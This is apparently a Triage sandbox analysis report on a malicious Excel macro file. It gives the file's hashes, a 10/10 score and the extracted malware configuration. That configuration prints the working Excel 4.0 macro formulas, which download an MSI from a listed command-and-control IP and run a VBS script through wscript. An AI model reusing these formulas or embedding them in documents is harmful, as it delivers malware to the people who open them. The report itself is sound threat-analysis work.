5a7ceb30ea7e766ef400daa33ad37e67 | Triage

Submit
Reports

Overview

overview

Static

static

5a7ceb30ea...7.xlsm

windows7-x64

5a7ceb30ea...7.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

5a7ceb30ea7e766ef400daa33ad37e67.xlsm

Resource

win7-20231129-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

5a7ceb30ea7e766ef400daa33ad37e67.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

7 signatures

150 seconds

General

Target

5a7ceb30ea7e766ef400daa33ad37e67
Size

6KB
MD5

5a7ceb30ea7e766ef400daa33ad37e67
SHA1

6bab7c0b150326d351235205db611f426b468a74
SHA256

f0dca587ff0e59ae1fdfe61bd91f775c2415c9dca3cf8cbf626f3c0a22cb6a7f
SHA512

138bd698bcdd140dbd00f8ee967b68ae6795f5cbfed63e4a68fb4f3453ca3d591374343694cd82945bd292c5421f725a92fe4c29ee4939a9a08f4b7eed9f5871
SSDEEP

192:NDSEuSabrA2OmmfRh8UhHFBFYuvb98yjA+b:NbuLM2w31FY2b98yjh

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

5a7ceb30ea7e766ef400daa33ad37e67
.xlsm office2007

© 2018-2025

Terms | Privacy